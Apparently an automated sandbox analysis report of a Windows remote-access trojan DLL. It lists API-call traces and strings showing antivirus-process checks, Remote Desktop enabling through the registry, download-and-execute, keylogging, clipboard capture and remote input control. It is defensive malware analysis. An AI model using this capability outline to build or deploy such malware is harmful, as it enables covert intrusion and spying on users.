                                • API ID: wsprintf$lstrlen$_strrev$CloseGlobalMemoryNameOpenQueryStatusValue$??2@ComputerCountCreateDiskDriveFileFirstFreeInfoInformationLogicalProcess32SnapshotSpaceStringsTickToolhelp32UserVersionVolume_strcmpi
                                • String ID: 360tray.exe$@$@$ESET $HARDWARE\DESCRIPTION\System\CentralProcessor\0$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KSafeTray.exe$KvMonXP.exe$PortNumber$ProcessorNameString$QQPCTray.exe$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$egui.exe$exe.DnoMvaR$exe.ds063$exe.pva$kxetray.exe$~MHz
                                • API String ID: 1471316505-3197601762
                                • Opcode ID: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                • Instruction ID: f75789e8d26e0488ce98ecbec9e6a297644c4fc480bb15a39e026aad78d3882d
                                • Opcode Fuzzy Hash: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                • Instruction Fuzzy Hash: A0E1D7B1504385AFE720CB64CC45FEBB7DAEFC4340F40892DF68597251EB74AA098B66
                                Function 10010760 Relevance: 79.2, APIs: 42, Strings: 3, Instructions: 406stringmemoryserviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10010811
                                • OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 10010826
                                • LocalAlloc.KERNEL32(00000040,00010000), ref: 10010839
                                • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 10010857
                                • LocalAlloc.KERNEL32(00000040,00000104), ref: 10010864
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100108AF
                                • LocalAlloc.KERNEL32(00000040,00001000), ref: 100108C2
                                • QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 100108D6
                                • lstrcat.KERNEL32(00000000,1007B8FC), ref: 1001091B
                                • lstrcat.KERNEL32(?,1007B8F4), ref: 1001093E
                                • lstrcat.KERNEL32(?,1007B8EC), ref: 10010961
                                • lstrcat.KERNEL32(?,1007B8E4), ref: 10010984
                                • wsprintfA.USER32 ref: 100109A1
                                • wsprintfA.USER32 ref: 100109CF
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                  • Part of subcall function 1000E630: RegQueryValueExA.ADVAPI32(?,100109FB,00000000,100109FB,?), ref: 1000E653
                                • wsprintfA.USER32 ref: 10010A10
                                • lstrlen.KERNEL32(?), ref: 10010A19
                                • lstrlen.KERNEL32(?), ref: 10010A25
                                • lstrlen.KERNEL32(?), ref: 10010A31
                                • lstrlen.KERNEL32(?), ref: 10010A3A
                                • lstrlen.KERNEL32(?), ref: 10010A46
                                • lstrlen.KERNEL32 ref: 10010A4D
                                • lstrlen.KERNEL32(?), ref: 10010A55
                                • LocalSize.KERNEL32(?), ref: 10010A67
                                • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010A75
                                • lstrlen.KERNEL32(?), ref: 10010A83
                                • lstrlen.KERNEL32(?), ref: 10010AA8
                                • lstrlen.KERNEL32(00000000), ref: 10010AB9
                                • lstrlen.KERNEL32(00000001), ref: 10010AD7
                                • lstrlen.KERNEL32(?), ref: 10010AED
                                • lstrlen.KERNEL32(?), ref: 10010B0E
                                • lstrlen.KERNEL32(?), ref: 10010B24
                                • lstrlen.KERNEL32(?), ref: 10010B4C
                                • lstrlen.KERNEL32(?), ref: 10010B5F
                                • lstrlen.KERNEL32(?), ref: 10010B81
                                • lstrlen.KERNEL32(?), ref: 10010B97
                                • lstrlen.KERNEL32(?), ref: 10010BBF
                                • lstrlen.KERNEL32(?), ref: 10010BD5
                                • lstrlen.KERNEL32(?), ref: 10010BFD
                                • CloseServiceHandle.ADVAPI32(?), ref: 10010C10
                                • LocalFree.KERNEL32(?), ref: 10010C1B
                                  • Part of subcall function 1000E4C0: RegCloseKey.ADVAPI32(?,?,10010C35), ref: 1000E56B
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010C56
                                • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010C64
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
                                • String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 1351573288-819907790
                                • Opcode ID: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                • Instruction ID: b787a0c5a13c364073f78a8c29dfe8d65fa9e81c690259f46e75a22daf9f128f
                                • Opcode Fuzzy Hash: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                • Instruction Fuzzy Hash: 94E18D722083859FD724CF24CC84AABB7E6FBC8700F44491DF68A97240DB75E949CB96
                                Function 1000B0F0 Relevance: 42.1, APIs: 4, Strings: 20, Instructions: 103shutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000B030: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                  • Part of subcall function 1000B030: lstrlen.KERNEL32(?), ref: 1000B05E
                                  • Part of subcall function 1000B030: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                  • Part of subcall function 1000B030: RegCloseKey.ADVAPI32(?), ref: 1000B084
                                  • Part of subcall function 1000B090: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B0AE
                                  • Part of subcall function 1000B090: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 1000B0CD
                                  • Part of subcall function 1000B090: RegCloseKey.ADVAPI32(?), ref: 1000B0DC
                                • _strrev.MSVCRT ref: 1000B150
                                • _strrev.MSVCRT ref: 1000B16F
                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B24A
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • ExitWindowsEx.USER32(00000002,00000000), ref: 1000B276
                                  • Part of subcall function 10011F80: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                  • Part of subcall function 10011F80: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                  • Part of subcall function 10011F80: GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                  • Part of subcall function 10011F80: CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseValue$CreateProcessToken_strrev$AdjustCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesVersionWindowslstrlen
                                • String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
                                • API String ID: 3375006655-3505973513
                                • Opcode ID: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                • Instruction ID: dc20f7a170daff86b313850e6ec23c72e1b0ea6aef47688a3a0a21085afcf0ea
                                • Opcode Fuzzy Hash: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                • Instruction Fuzzy Hash: AA31A174940F28B5F120E6A04C4FFEB6648CB50788F10C418FBD878287FB697261816F
                                Function 1000B6F0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 137filesleepnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(000007D0), ref: 1000B6FF
                                • GetTickCount.KERNEL32 ref: 1000B753
                                • wsprintfA.USER32 ref: 1000B768
                                • URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B780
                                • GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B794
                                • fopen.MSVCRT ref: 1000B7A4
                                • fscanf.MSVCRT ref: 1000B7CB
                                • GetTickCount.KERNEL32 ref: 1000B7D9
                                • wsprintfA.USER32 ref: 1000B7F1
                                • GetTickCount.KERNEL32 ref: 1000B7F6
                                • wsprintfA.USER32 ref: 1000B80E
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B829
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B843
                                • fscanf.MSVCRT ref: 1000B857
                                • fclose.MSVCRT ref: 1000B866
                                • DeleteFileA.KERNEL32(C:\), ref: 1000B874
                                • Sleep.KERNEL32(?), ref: 1000B8BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
                                • String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
                                • API String ID: 2342319182-3740277425
                                • Opcode ID: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                • Instruction ID: 0df0333b831ebe22e1ced74288834e4a7ee40290f568383da85469ab5f36e64c
                                • Opcode Fuzzy Hash: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                • Instruction Fuzzy Hash: E6410471108391ABF324DB60CC89FEB379DEB84701F008918FB8996180DFB5AA08C766
                                Function 10007070 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 100070B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AccountLookupName
                                • String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
                                • API String ID: 1484870144-2807325862
                                • Opcode ID: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                • Instruction ID: e483fb9418fd38a6f4b972ea0e4669484a3c348eff1775e07851af791e1d4d35
                                • Opcode Fuzzy Hash: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                • Instruction Fuzzy Hash: 7A21307150C382AFE301CB64D884B9BBBE4ABA5744F44894CF4D846252E2B8D64DC7A3
                                Function 10008B50 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 167filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?,?,?), ref: 10008B8A
                                • wsprintfA.USER32 ref: 10008BC3
                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008BD5
                                • wsprintfA.USER32 ref: 10008C14
                                • wsprintfA.USER32 ref: 10008C37
                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008CAD
                                • ??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008D16
                                • FindNextFileA.KERNEL32(?,?), ref: 10008D45
                                • FindClose.KERNEL32(?), ref: 10008D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
                                • String ID: %s%s%s$%s%s*.*$.
                                • API String ID: 862180513-1343461528
                                • Opcode ID: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                • Instruction ID: 519f5399ce91295c37a26932b4474774ed52c623669e24a96c359b1586835bbf
                                • Opcode Fuzzy Hash: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                • Instruction Fuzzy Hash: E851D1B14083809FE724CF28C884A9BBBE5FBC8750F404A1DE5D957291DB75EA09CB56
                                Function 10009A00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156keyboardsleepstringCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(0000000A), ref: 10009A66
                                • lstrlen.KERNEL32(?), ref: 10009A71
                                • GetKeyState.USER32(00000010), ref: 10009ABB
                                • GetAsyncKeyState.USER32(0000000D), ref: 10009AC7
                                • GetKeyState.USER32(00000014), ref: 10009AD4
                                • GetKeyState.USER32(00000014), ref: 10009AFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$AsyncSleeplstrlen
                                • String ID: <BackSpace>$<Enter>
                                • API String ID: 43598291-3792472884
                                • Opcode ID: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                • Instruction ID: 6c961daac165878122585f88262e92b73c779f3799918725d04435c3580de12f
                                • Opcode Fuzzy Hash: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                • Instruction Fuzzy Hash: 5D5165325083869BFB10DF64ED947AF73E9EB86390F000D28E99183094EB75D849C393
                                Function 100086F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 71fileCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                • String ID: %s\%s$%s\*.*$.
                                • API String ID: 2470771279-1471744235
                                • Opcode ID: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                • Instruction ID: 4997ef6c0a53b4edcb34f252ea04d2ab30cd8e24f1ff6c4f86697f3dae8976e3
                                • Opcode Fuzzy Hash: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                • Instruction Fuzzy Hash: D111A8711083955BF220DBA0DCC8EEB77ACFFC5351F054C19F69942144E7B9964887A6
                                Function 10008520 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155memoryfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,00002800), ref: 10008542
                                • wsprintfA.USER32 ref: 1000855F
                                • FindFirstFileA.KERNEL32(?,?), ref: 10008575
                                • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 100085CB
                                • lstrlen.KERNEL32(?), ref: 1000865A
                                • FindNextFileA.KERNEL32(?,?), ref: 100086AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocFileFindLocal$FirstNextlstrlenwsprintf
                                • String ID: %s\*.*$h
                                • API String ID: 1497773571-1052742963
                                • Opcode ID: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                • Instruction ID: 6dc3bffa24102d40f333cfea9b115bd59c6de41bc40a21ef2b6d5182f104caaf
                                • Opcode Fuzzy Hash: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                • Instruction Fuzzy Hash: 825178319083829BE720CF248C8468BBBE6FF95384F014618FDD497381D77A9A09CB95
                                Function 1000A6B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82registrystringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A6FA
                                • RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A718
                                • RegCloseKey.ADVAPI32(?), ref: 1000A723
                                • Sleep.KERNEL32(00000001), ref: 1000A72B
                                • lstrlen.KERNEL32(?), ref: 1000A736
                                • strstr.MSVCRT ref: 1000A74A
                                • lstrcpy.KERNEL32(00000000,?), ref: 1000A759
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A7AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
                                • String ID: Applications\iexplore.exe\shell\open\command$D
                                • API String ID: 454182167-535818822
                                • Opcode ID: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                • Instruction ID: 593cd418b48c47020334956aaadb0b49f021ee54466ec57afc295a09b57ba92d
                                • Opcode Fuzzy Hash: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                • Instruction Fuzzy Hash: 36216071208351AFF710CB60CD49FAB77E9EB85741F00491CF689962D0DBF8A948CB62
                                Function 1000F840 Relevance: 13.7, APIs: 9, Instructions: 163keyboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10012980: GetCurrentThreadId.KERNEL32 ref: 10012992
                                  • Part of subcall function 10012980: GetThreadDesktop.USER32(00000000), ref: 10012999
                                  • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                  • Part of subcall function 10012980: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                  • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                  • Part of subcall function 10012980: lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                  • Part of subcall function 10012980: SetThreadDesktop.USER32(00000000), ref: 10012A18
                                  • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A30
                                  • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A33
                                • SetCursorPos.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8A8
                                • WindowFromPoint.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B0
                                • SetCapture.USER32(00000000,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B7
                                • MapVirtualKeyA.USER32(?,00000000), ref: 1000F8F6
                                • keybd_event.USER32(?,00000000), ref: 1000F900
                                • MapVirtualKeyA.USER32(?,00000000), ref: 1000F914
                                • keybd_event.USER32(00000000,00000000), ref: 1000F91E
                                • mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000F9DA
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
                                • String ID:
                                • API String ID: 1258999209-0
                                • Opcode ID: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                • Instruction ID: 813ed5156889d3fee33ae762c864079a57abd66bf6c8d8a424e07c18233b4e17
                                • Opcode Fuzzy Hash: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                • Instruction Fuzzy Hash: F34191317C0365BAF230CA148C8BF6A76A5E744F81F30811AF745FEAC9C5E4B940A69D
                                Function 1000FA90 Relevance: 13.6, APIs: 9, Instructions: 57clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 1000FA9A
                                • GetClipboardData.USER32(00000001), ref: 1000FAA6
                                • CloseClipboard.USER32 ref: 1000FAB6
                                • GlobalSize.KERNEL32(00000000), ref: 1000FAC5
                                • GlobalLock.KERNEL32(00000000), ref: 1000FACF
                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FAD8
                                • GlobalUnlock.KERNEL32(?), ref: 1000FAFF
                                • CloseClipboard.USER32 ref: 1000FB05
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FB17
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
